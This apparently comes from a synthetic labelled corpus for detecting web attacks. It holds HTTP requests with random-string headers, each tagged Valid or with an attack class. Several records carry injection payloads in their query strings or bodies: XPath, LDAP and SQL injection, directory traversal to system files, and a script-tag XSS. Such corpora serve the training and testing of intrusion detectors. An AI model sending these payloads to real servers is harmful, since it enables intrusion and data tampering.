If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic U2VlcHNzdFg6aXJkdG9z
Authorization: NTLM bGRhZXVvbnRna2Vib2hOcTk5d2ZydG9sbmlsdHd0b2xsZGplaXRoaVI=
Range: 75-484,-76,208013-709
Referer: /Soahti/idgrtdee/wjironen/NjonzOne.png
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: aasa/9.0
UA-CPU: 68000
UA-Disp: 408,046,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 728x570
Via: 8.8 www.satnnft.htm, FTP/6.1 www.eadpr.css, 1.9 www.D2ta.jpg
Transfer-Encoding: compress
Upgrade: oje/5.1
Warning: 797 59.247.222.32 "dfucaar" 
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

oedrCzhtskhos=rk@8h

End - Id: 6812
Start - Id: 4551
class: Valid
PUT /tnhdocto/ylrJES0aYZ8tLZ/sNaathte3puj/bCZ1OCyYRPEv7D76Ugx9/iiO8AfhtTiSot/mJkNXsi19NQeaqUs@-/fxnJR7kYbE/zusE/aLeueUjv.dll? HTTP/1.1
Content-Length: 134
Content-Language: oqjEe,oceL
Content-Encoding: identity
Content-Location: /catU/to7xt/ouhCrr/rgbiuf.zip
Content-MD5: Q25uZWhzdW9uVHNpYWhrVA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Dec 09 17:31:12 UTC
Last-Modified: Mon, 01 Aug 05 15:41:47 GMT
Host: 10.59.54.76
Connection: close
Accept: */*;q=0.2
Accept-Charset: cp-936;q=0.2, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: lunspaa6-cuAdoho;q=0.8
Cache-Control: c=J8r9nu
Client-ip: 131.137.11.104
Cookie: FMJc_R4Rl=014833256;qtnQhimgqG=h y;G65@=i@S3yffGOEzt
Cookie2: $Version="1"
Date: Wed, 03 Mar 04 03:35:55 CET
ETag: W/"qeHGrc95g0GImT00kGEh"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Mon, 16 Jun 08 22:30:42 GMT
If-Unmodified-Since: Thu, 09 Apr 09 17:09:09 UTC
If-Match: "1T5BrFpsza0b8IUBJYOy"
If-None-Match: "XrUWnQ4lAV5M6vc@R5D"
If-Range: Tue, 05 Aug 08 22:14:06 UTC
Max-Forwards: 793
MIME-Version: 8.1
Pragma: m=seahr
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: Digest nc=CA1e9F6D
Range: -574,-888
Referer: /onteq/xseonto.ace
TE: trailers
Trailer: Host
User-Agent: Mozilla/0.7 (X11; U; Solaris 0.1; Tn-ia; rv:2.9.4) Gecko/50260901
UA-CPU: x86
UA-Disp: 453,6755,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3467x636
Via: 6.8 www.Aiheale.css:29
Transfer-Encoding: identity
Upgrade: 5oSf/8.1, asfrl/0.4, ageuy/4.8
Warning: 574 www.hss2sl6e.png "on5onhiTe8lntsIIeien" 
X-Forwarded-For: 165.72.96.126
X-Serial-Number: 60314
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kUIZ=nrMcuaeb9&r02N=(t[3>htr&hlfeilai7wcgold=o)o(oc F&eeeaa93etajlha=ta)stmpcdeuctia&snxaoeyosldeVmo=<om&Tmac2aPQ=510806

End - Id: 4551
Start - Id: 27742
class: Valid
GET /gvgBcT/g6OLOX.jpeg?emeopenIv@aGDR=5&piiH=bn0hIwiicoWafs&nplc1rar=passthrusDpasswd%5C2rtsaee&502O=stYmailSbur&b9oslstzteeimei=pcshUa HTTP/1.1
Host: 217.222.160.60
Connection: Adsaoe
Accept: image/*;q=0.9, image/png;q=0.1, image/*;q=0.9
Accept-Charset: x-mac-turkish, iso-8859-9;q=0.5, x-mac-japanese;q=0.5, x-mac-cyrillic, us-ascii
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=3625
Client-ip: 111.158.89.180
Cookie: uIni=rbin' ;nqte=ktnreouaAae;B3CLM=73666;reob4lrrbmg=6130;c7gn=slBgKhmBZx
Cookie2: $Version="92"
Date: Sun, 28 Jun 09 19:45:43 GMT
ETag: "hP6VFLNv.5ogTM8"
Expect: nsiuii=vEscmbj
From: bete@ulsn.uk
If-Modified-Since: Fri, 16 Sep 05 21:37:21 CET
If-Unmodified-Since: Thu, 21 Jun 07 17:55:44 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Aug 04 17:45:49 CET
Max-Forwards: 2
MIME-Version: 2.1
Pragma: eier=ie
Proxy-Authorization: Basic dFJEdGk6NVluZQ==
Authorization: ekg1s lchaffa3=iedira
Range: 257-
Referer: http://www.vroe.biz/GeeI.php4
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: athrlo (ao@esMz; sAi2AwidNZ)
UA-CPU: 68000
UA-Disp: 4365,8594,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 483x5740
Via: 7.2 www.wAueRh.html, 2.1 106.142.95.194
Transfer-Encoding: gzip
Upgrade: vebunl/5.1
Warning: 677 11.109.58.216 "dsdgrmasohh" "Fri, 19 Jun 09 16:50:58 GMT"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27742
Start - Id: 7976
class: Valid
PUT /rd9eivt.htm? HTTP/1.1
Content-Length: 57
Content-Language: a2o8Zei,8n
Content-Encoding: identity
Content-Location: http://www.orA6.cz/Eehw/mn4n/srgonue/qAne/tu4ld.png
Content-MD5: N3RhZWFvd25zeXRGc29vdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Jul 09 18:33:45 GMT
Last-Modified: Mon, 08 Jun 09 12:14:04 CET
Host: www.anet5osey.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.8, ks_c_5601-1987;q=0.3, windows-1252
Accept-Encoding: *;q=0.7
Accept-Language: iutI4eEp-ee8, ruzss-o, 7-dini;q=0.9
Cache-Control: no-cache
Client-ip: 75.162.183.217
Cookie: M054homeFJ=tP0VIi;eeetaThTsgnfst=944;ehl8tl9naap7Hrs=8?nf\>=p
Cookie2: $Version="4"
Date: Thu, 01 Apr 10 10:46:34 UTC
ETag: "vSwg.t8VN@YH431HW"
Expect: a9oS8=esntrd
From: lggvhin@tEusa.fr
If-Modified-Since: Sat, 02 Aug 08 22:13:16 CET
If-Unmodified-Since: Sun, 01 Oct 06 23:00:47 CET
If-Match: *
If-None-Match: "i40.C35wTru8CaR"
If-Range: *
Max-Forwards: 2
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic NnR0ZXg6MWppamloaWg=
Authorization: Basic ZWE4ZGVhTjpvZWx5c2Vl
Range: -607
Referer: http://www.hdune.biz/rrayavMe/egen/nsqtw/tczayt/otcuawm.asp
TE: trailers,gzip,deflate;q=0.6
Trailer: User-Agent
User-Agent: hedTzi3/0.7.5
UA-CPU: x86
UA-Disp: 4676,8640,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 094x6003
Via: FTP/6.8 229.231.218.49, HTTP/1.0 www.sopeeiee.html
Transfer-Encoding: deflate
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

7oC=atendr&d1Zioz1zaTgtuc=w8wVzj&QtmpNj=odzUL&scc=/ten5

End - Id: 7976
Start - Id: 49305
class: XPathInjection
GET /dtLGsPWd2WFmoW@X/hC7t3sDbplSYOXOEBtIV/soomecsmn/5tqpgTeTsqdecwa/nUf-PtyN0s9DBIu.tM5/aJTTQtOFPoKw@/ecmUucaDRar-ei.html?K204rs=n8&5l2tuau5avb=+en&ns=agICcsubrh1sop&wssl8bv=ol2te&sRdajs95i8=8ieahavingaietmpcmdid+nimaar&tmae=ahs%27+or++++1%3C+++++eeXnat%2Ft%2FhlnTcZ%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D83%5D++or+++++%27Irsnbzx%27+%3D++%27&kels=831320 HTTP/1.1
Host: 63.154.24.106:80
Connection: j5dnOw
Accept: image/*;q=0.2, image/*;q=0.1, image/gif;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mhTiner-nnr, atoin-etrtwts, lEoe-ro;q=0.0, sa8-deoeeg;q=0.1
Cache-Control: min-fresh=33
Client-ip: 249.173.49.26
Cookie: lnu=rKG;ro4=genenoiudnshyma;Qnph-So=01 seZoeval21;wUi1eynli=422;.aKwmVmOQWhC=7ro;r2G5T3kxp_locationAqC=os8KsRtusoY
Cookie2: $Version="34"
Date: Mon, 12 Nov 07 14:44:43 GMT
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 01 Dec 06 23:04:55 UTC
If-Unmodified-Since: Sat, 07 May 05 17:06:36 UTC
If-Match: "eZVfXv@bAQ9L_nCq"
If-None-Match: *
If-Range: Wed, 09 Aug 06 24:17:31 UTC
Max-Forwards: 1
MIME-Version: 9.1
Pragma: ir=9
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 762-
Referer: http://atq9e.org/8tmloonT/mqhc2ed/9nrqb1it/Nlsc/rasit.sh
TE: deflate;q=0.5,gzip;q=0.0,trailers
Trailer: Date
User-Agent: d8ttue8se/5.7.9.5.0
UA-CPU: StrongARM
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 902784
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49305
Start - Id: 21395
class: Valid
GET /deaetehjz/pS/hslxtyl.jsp?Wxlsy=3&O3aar=0936&ie=y&pFI90@like=5501&oa1zgptd1h0D=ul%3B&Eesimohnbhuhe=edt+h%5Bo4%24 HTTP/1.0
Host: 22.77.192.174
Connection: keep-alive
Accept: image/gif
Accept-Charset: windows-1254;q=0.4, us-ascii;q=0.5
Accept-Encoding: 
Accept-Language: a9hie-s5Eehe;q=0.1, a-w;q=0.4
Cache-Control: min-fresh=67
Client-ip: 10.26.221.222
Cookie: ce8ZthNote0il=4446904707;5nasb7=uSe
Cookie2: $Version="94"
Date: Wed, 24 Mar 04 17:44:19 UTC
ETag: "Z-9HoGlKHHkcNlX"
Expect: eeoemua
From: 6nzmsEZ@elsd.cz
If-Modified-Since: Fri, 16 Feb 07 14:15:40 CET
If-Unmodified-Since: Tue, 25 Sep 07 08:45:54 GMT
If-Match: "d0KWbOJeiTS0@R55XG8"
If-None-Match: *
If-Range: "cIwU-YegDmSZ5RBw"
Max-Forwards: 3639
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: niiafr ve3n=esohhuo1
Authorization: Basic ZXpjaTA6bWRDMUk=
Range: 3184-,5431-
Referer: http://idet.st/tlWreag/rtRona.pl
TE: chunked;q=0.5,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: egeEugq (6IzSLAu3Y; drVPiDX00b; n1eMxL; aspLJ1tC)
UA-CPU: x86
UA-Disp: 0248,8478,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 140x5105
Via: h0usmd/8.6 www.Tsdrrsnc.gif, caleo/1.6 54.112.129.106, 3.8 www.rAhn6h.html
Transfer-Encoding: identity
Upgrade: nme/2.8, wht/3.6, Msods/5.6, apd/5.1
Warning: 043 24.229.27.123 "ortNea7pt" 
X-Forwarded-For: 131.153.107.61
X-Serial-Number: 2418413
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21395
Start - Id: 36098
class: PathTransversal
GET /qG32N2WR/Xhaving@HSe.php4?YVRf.n=2&irOncUslieihct=twonea&paie4Vngavwe=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&slree1enaleb=1ntlrohttpdfrom0&netmurkvp6fobje=bconnectk&njmzyiiB3ptv=5tSsorel&rr7=vOz&PexecWH9jTOq1.=qtdechoakknrimgmt HTTP/1.1
Host: www.dwhp.biz
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 9egtoae-TMEm, eyror-5SiHfh;q=0.6
Cache-Control: max-age=801
Client-ip: 200.55.112.27
Cookie: 6bp8TI448g=0;etaya5sgnd4iSz=t0BW;toGchmecuh=roT cemhtqT<;enitdki=wpg;i7hsjn=263
Cookie2: $Version="7"
Date: Sun, 11 Apr 04 20:25:19 GMT
ETag: W/"Og53tD5Fr.sQ6S3"
Expect: tyscmrym
From: lemgP@orThcs1lso.de
If-Modified-Since: Sat, 28 Jun 08 08:56:47 GMT
If-Unmodified-Since: Tue, 16 Jan 07 01:24:24 CET
If-Match: "9D4fY42SD-lYq8pqMe"
If-None-Match: "IYfKKcGoZz4j.DmoV"
If-Range: Fri, 20 Jan 06 02:55:41 UTC
Max-Forwards: 936
MIME-Version: 3.5
Pragma: xs=t
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Basic bWVjZzppdHVnb2Y=
Range: 78-
Referer: /lerasn/h1u1.mp3
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/5.4 (X11; U; Solaris 7.6; di-os; rv:6.0.3) Gecko/85350358
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6563x796
Via: FTP/1.1 www.k5ctee.htm, 7.0 120.124.161.100:0, 5.5 www.niAni.js
Transfer-Encoding: compress
Upgrade: Fd1sk/0.3
Warning: 206 www.wtehi.html "rfrneAalg3inhttgnz" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36098
Start - Id: 31558
class: Valid
GET /ii5U-a20xrsvMSisi/htV/BJbNL2n3/haeBunr6ting/c_N-mcxo0RaQ_l.exe?eopsP5kboTC30=rd&MQ7s=e%7Es+o&ljjs0da=889&oehtt6i0v=Ekhtpassfd HTTP/1.0
Host: 12.82.222.28
Connection: c5hed1ie
Accept: application/*, application/zip;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, deflate, compress;q=0.5, deflate
Accept-Language: *
Cache-Control: max-age=44
Client-ip: 169.171.180.212
Cookie: r5r=dh'iBo
Cookie2: $Version="8"
Date: Thu, 13 Mar 08 19:42:34 GMT
ETag: "SieCCYSjLMMQo1sQ"
Expect: como1nu
From: 2ief@fcey7.uk
If-Modified-Since: Wed, 15 Apr 09 14:27:08 CET
If-Unmodified-Since: Wed, 30 Jan 08 02:15:19 UTC
If-Match: "DmADQ8BMyFfbQtj8eRA"
If-None-Match: *
If-Range: Sat, 13 Jan 07 11:09:37 GMT
Max-Forwards: 7705
MIME-Version: 7.0
Pragma: ane='gsstar5y'
Proxy-Authorization: NTLM dE1laXRucXB0bjJ0ZGRybHlpYW9ubm50c3JobnVtZXpoZGhhZWU=
Authorization: Basic ZXB5Tm9lYTphc2U2aW9i
Range: 355-82184,955520-77,01-27679
Referer: /lntai/7eamr/n2dt/iVoeo4/lDpat.cfm
TE: trailers,deflate;q=0.8,trailers
Trailer: Warning
User-Agent: Ekleac/2.6
UA-CPU: x86
UA-Disp: 7964,455,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 951x498
Via: ipe/9.1 www.atAgo7bU.html, HTTP/6.9 196.208.94.203
Transfer-Encoding: whPwt
Upgrade: iwe/8.2, ep3eof/7.6, paia/0.4, e4dhI/1.4
Warning: 368 www.ergmb.gif "hlleNwwiAeidy" 
X-Forwarded-For: 231.71.249.70
X-Serial-Number: 7616561595248452
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31558
Start - Id: 4545
class: Valid
PUT /6@P0Ay6hIH/io0/34RljEmIyuza/eukttaha7ttn/tLD/ei3iOs3e0n4ztgiina6e/w0/Tn31gojaetnns.asp? HTTP/1.0
Content-Length: 143
Content-Language: csonn0a,obsalyAu
Content-Encoding: deflate
Content-Location: /3tpah/paasbi.jpeg
Content-MD5: MTNvYTJudGhpaWN0YXVteg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Jan 07 15:29:46 GMT
Last-Modified: Tue, 09 Jan 07 19:30:55 CET
Host: www.e8oa.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 67.217.32.239
Cookie: fttkfhliGpt=92283;73JqAformXnodeZnq=aIloieaoIev;se=admin9a(;Isayeu6r=55177111
Cookie2: $Version="48"
Date: Thu, 21 Feb 08 10:22:00 UTC
ETag: W/"Sbdxh-Z.7yodqrahW9"
Expect: 100-continue
From: ejuo@FxhthsevrC.org
If-Modified-Since: Wed, 12 Sep 07 04:23:33 GMT
If-Unmodified-Since: Sat, 20 Jun 09 19:03:00 GMT
If-Match: "@F-dAFu7IH7u0VIw"
If-None-Match: *
If-Range: *
Max-Forwards: 3786
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: siAwto Meexad=tnbnonc
Authorization: euktT bEhy=Tnaoyao
Range: -574,-888
Referer: http://enIc2.gov/DhEiOr/ora1Lo/agyhi.pl
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/2.2 (X11; U; Open BSD i386 3.7; at-xl; rv:8.7.0) Gecko/78828643
UA-CPU: 68000
UA-Disp: 453,6755,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3467x636
Via: 4.3 78.171.212.142, HTTP/2.7 www.olHtn.html:75
Transfer-Encoding: l4yy; e7Hnh=Tos8
Upgrade: 5oSf/8.1, asfrl/0.4, ageuy/4.8
Warning: 831 23.54.115.116 "diole" 
X-Forwarded-For: 165.72.96.126
X-Serial-Number: 3502592947327155
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oegmoocfTz=r9rromalrnau10aR&Le9E3Av4ttufkSn=to0&IGfYftpe=850839&.OphpgbcmdhttpsS2U1=la]lacAr3p&nteae7yt59ses=o5nahrarTojsGga&uRsAztueawtlY=2i

End - Id: 4545
Start - Id: 37835
class: LdapInjection
GET /as6EnaIOdktaTte/nsdelg7um3cbom7hr/ntRo4senmr/oaZbaRA/1g8DhxGluZgwinnt/o6W@/4jVJ3jauG/bls/fs6fp01JM/siskhiereoedhalq/ssyjenseeha.msf?eocltyk7rdtcne=o6t3T4dX8n&sEz2wz=aR805&dnnnayu=elwt++rtck&CLuXhomezt_=578136717&8smnoseta=346&tsefTe=osOm8uglz6ntm&vmdnetdaen=rlss81A8x&tuTez=%29%28+%7C++++%28+cn%3D*o+++%27brien*++%29%28mail+++%3D*o++++%27brien*++++%29&DnodeandnFgW=Yiieai HTTP/1.1
Host: www.tfaeeetre.org:49
Connection: nltskne
Accept: image/*, audio/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: im-tmmkiyd8;q=0.5, jMo-ttdTora;q=0.9, tRNj-3nsneee, 2nee-tmltroEt;q=0.2
Cache-Control: cso='ul9oe'
Client-ip: 145.59.192.187
Cookie: rydAN1d87iua=emog 9hodrop0s5Tal 17 ;ltl=0E6aphp
Cookie2: $Version="4"
Date: Mon, 05 Feb 07 02:56:42 CET
ETag: W/"7bZNocxT.N2HZG9O"
Expect: 100-continue
From: tlocso@Staohr.gov
If-Modified-Since: Fri, 19 Mar 04 06:10:00 CET
If-Unmodified-Since: Mon, 01 Oct 07 17:16:32 UTC
If-Match: "6LDVJKbY8NZaxk.pXUk"
If-None-Match: "__vM8@93Slw96AX_m9"
If-Range: Wed, 13 May 09 05:41:20 UTC
Max-Forwards: 6
MIME-Version: 1.8
Pragma: tylayyth='anqaxab'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: NTLM cGVvZ3RzdGl0dWh0ZTJjbkFudGhpVTAxdHI5c3NuaWlsYW1iZTRpQXUxb3VtenM=
Range: 853418-,-430
Referer: /qrieh/csmmsstg/dirnmm/hdoRtn.doc
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/8.1 (compatible; Konqueror/4.0; Unix; TmketjobRD; icfHiixm)
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 4.1 www.ohR4hiB.css, nnbe/5.9 60.59.122.232, 8.4 46.177.89.231:12763
Transfer-Encoding: compress
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37835
Start - Id: 44713
class: PathTransversal
PUT /w%u_/8LvIk/o34/F4a@Qgtmp1JRFRupdate/sx_@0Aem4v9/v5A.nsf? HTTP/1.1
Content-Length: 219
Content-Language: x
Content-Encoding: identity
Content-Location: http://www.er5t.org/nrsyU/ytOydlyt.php4
Content-MD5: RXhlYjVyZWxpYW1paVRyag==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Nov 07 04:30:24 GMT
Last-Modified: Sun, 24 Apr 05 18:56:56 CET
Host: 101.146.8.240
Connection: close
Accept: audio/*, application/*, application/*;q=0.6
Accept-Charset: cp-950, utf-8;q=0.9, iso-8859-3, iso-8859-8-i;q=0.2, x-mac-arabic
Accept-Encoding: 
Accept-Language: Ojdnelr-e, o-sv;q=0.8, ayabr-wdd7de;q=0.8
Cache-Control: only-if-cached
Client-ip: 230.63.102.101
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="11"
Date: Fri, 30 Oct 09 20:04:11 GMT
ETag: "plt73QUn8kWDZLJVBbM"
Expect: 100-continue
From: ntofsxe@nilrhaih6.gov
If-Modified-Since: Thu, 10 Feb 05 01:59:17 CET
If-Unmodified-Since: Wed, 06 Oct 04 07:36:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9097
MIME-Version: 4.9
Pragma: naqRi='ji'
Proxy-Authorization: o7lshm rootirq=tt9s
Authorization: NTLM YXNlbDZobmU1ZXFhbHNrbWVleGhubVNhaGhlbHduRDJuY3dudmloZUQwZ3gzcjA=
Range: 8542-,-709
Referer: http://mees.com/2c8EbIi/ti6oliei/urmarwiz.php
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.9 (X11; U; Linux i586 6.1; Oh-ea; rv:5.6.3) Gecko/27629562
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: 2.0 www.lwretn1.jpeg, nfrR/2.0 www.rseer.html:02809, 0.5 62.95.39.95:45
Transfer-Encoding: ttmwo; whnei=IauLn8
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 321 92.208.70.203:11 "elAnigceatyit1" "Sun, 21 Nov 04 10:31:52 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ERyFd3S@=doc(   file:///c:/cTu/tdc.xml    )&nZdS2ttne3=$tmpn&c7@Rq1xmlU=oReanrhnodhdmo&tr0nouesv6egeo=odvnm&asUbi3acvn=611550781&s5oxhenaeeri=0Qtw_hROV&thAiifrinjin=6tTshAuclp&rwnAlgZd2dQ8ms=skiOeswt

End - Id: 44713
Start - Id: 47351
class: XSS
GET /eh.winntLfromwhereB.msf?fezN=tc-2.Ep&ednes1oda=%3C%21--+--+--%3E%3Cscript%3E%5Balert++%28%27lSpy%27%29%3B%5D%3C%2Fscript+%3E%3C%21--+--+--%3E&hieac=83186&atie=ooekatolocr4u&lnlnOkeEx5lclEe=l%28e3npt+0%5DbsgA%28bnt HTTP/1.0
Host: 163.103.28.69
Connection: close
Accept: application/*;q=0.3, video/*;q=0.5, application/rtf;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.0, compress;q=0.2, gzip;q=0.0, compress;q=0.5
Accept-Language: *
Cache-Control: min-fresh=92
Client-ip: 158.76.70.248
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="15"
Date: Fri, 05 Mar 10 22:04:14 CET
ETag: "mIzAAV5Ptg5ejv@T"
Expect: 100-continue
From: KhcttS@4dsl.fr
If-Modified-Since: Mon, 25 Jul 05 03:35:12 UTC
If-Unmodified-Since: Wed, 02 Dec 09 08:57:23 UTC
If-Match: "KNiT0QYz2I3IL1qx"
If-None-Match: *
If-Range: *
Max-Forwards: 65
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM dHphWjZucnRldWFnZ1BpemFucm9kbXJlbmR0bGYxaGhkcjI=
Authorization: NTLM b25hbmVhbWV0ZkFzdWVhc2hyNUZsOWllYWF0bnFFZGFn
Range: -066761,152-
Referer: http://www.hg1svaSh.be/nrwsig5/uda74is.php
TE: trailers
Trailer: If-None-Match
User-Agent: ictr/4.6.0.8
UA-CPU: MIPS
UA-Disp: 2126,5333,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 781x9042
Via: emor/0.7 www.Cninesed.jpg, 6.3 www.oroh.shtml, 2.6 98.139.179.165
Transfer-Encoding: gzip
Upgrade: itl1uf/7.7, esrcoi/9.1, 8a9z0/1.1, naxxh/6.9, sei/5.7
Warning: 189 www.heie2TOp.tiff:44669 "batcacSuto0ta" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47351
Start - Id: 35120
class: SqlInjection
POST /et-t4WRgiQL/QKyw7PURi/wel/yeguzxshovtyahd/openyvsPe8d1cKIP/mprocessing-instructiont/a6c/45kZ9Y/tZee/tIsfse2auooLoT/aenashadc6eushQc.js? HTTP/1.1
Content-Length: 198
Content-Language: Citnmisr,tny,doNi
Content-Encoding: identity
Content-Location: /ssb4ieFq/plWmef/iiuu/59eet/otk1.html
Content-MD5: b2VFZXdnaXRoaXJkdGJlaA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 29 Mar 10 16:58:32 CET
Host: 38.29.135.236:80
Connection: close
Accept: application/*;q=0.5, audio/*, audio/basic
Accept-Charset: iso-8859-5, macintosh
Accept-Encoding: gzip;q=0.7, deflate;q=0.1, identity
Accept-Language: tMnmlao9-tf
Cache-Control: min-fresh=15337
Client-ip: 116.103.238.253
Date: Thu, 02 Oct 08 19:58:38 UTC
Expect: otivt=3rMnsoaS
If-Modified-Since: Thu, 05 Nov 09 23:21:39 UTC
If-None-Match: "IqZKmOoHrd@xw-iN6"
If-Range: Thu, 25 Mar 10 20:23:55 CET
Max-Forwards: 00
Pragma: no-cache
Range: -61
Referer: /Teeiher/eoiwt.mspx
TE: trailers,trailers,deflate
User-Agent: Mozilla/1.8 (X11; U; SunOS sun4u 8.3; sy-he; rv:3.7.3) Gecko/76555745
UA-OS: Win98
Via: HTTP/4.0 www.dheit.png, eeiL/6.0 34.161.68.174, 5.5 48.178.177.62:54260
Transfer-Encoding: rdtn
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

st4teafnb=9331928174&iswfwm=>Iueat li&ootitrroiio=srysGne&oeisn2A=67411059&At5=';   insert  into     tsdUm   values(666,'tRgx','obAafdc',0xfffff)&yzvZjq=1ihdjebiBgtoAu&sr=642

End - Id: 35120
Start - Id: 4008
class: Valid
POST /szwsMYl/h9gilo/lgeirhew8ircear/t5OSKuzwUsv139@V.jsp? HTTP/1.0
Content-Length: 95
Content-Language: dmtsmiE
Content-Encoding: gzip
Content-Location: /ttxit/drgnra/n8l0/ltEuh.php3
Content-MD5: RmF0YXRSaGZpYXFuZWFlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Jul 05 02:06:24 GMT
Last-Modified: Fri, 27 Jun 08 23:22:51 GMT
Host: 11.243.106.178
Connection: keep-alive
Accept: image/*
Accept-Charset: isiri-3342;q=0.8
Accept-Encoding: deflate;q=0.8, identity, deflate;q=0.7, compress, deflate
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 189.78.56.150
Cookie: sam.GGl=82352303
Cookie2: $Version="7"
Date: Thu, 29 Sep 05 12:28:48 UTC
